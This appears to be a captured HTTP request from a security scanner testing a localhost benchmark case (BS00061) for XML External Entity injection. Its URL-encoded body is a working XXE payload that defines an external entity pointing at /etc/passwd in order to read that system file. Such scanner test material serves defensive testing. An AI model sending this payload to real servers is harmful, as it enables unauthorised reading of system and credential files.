POST /xxe/BS00061 HTTP/1.1
Host: localhost
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Referer: http://localhost/xxe/BS00061
Cookie: BS00061=BS00061;
scannerauth: cd117e0a9365670f19c768032f8dabfe
Content-Type: application/x-www-form-urlencoded
BS00061: BS00061
Content-Length: 227

BS00061=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+test+[%3C!ELEMENT+test+ANY+%3E%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2F/etc//passwd%22+%3E]%3E%3Croot%3E%3Cname%3E%26xxe%3B%3C%2Fname%3E%3C%2Froot%3E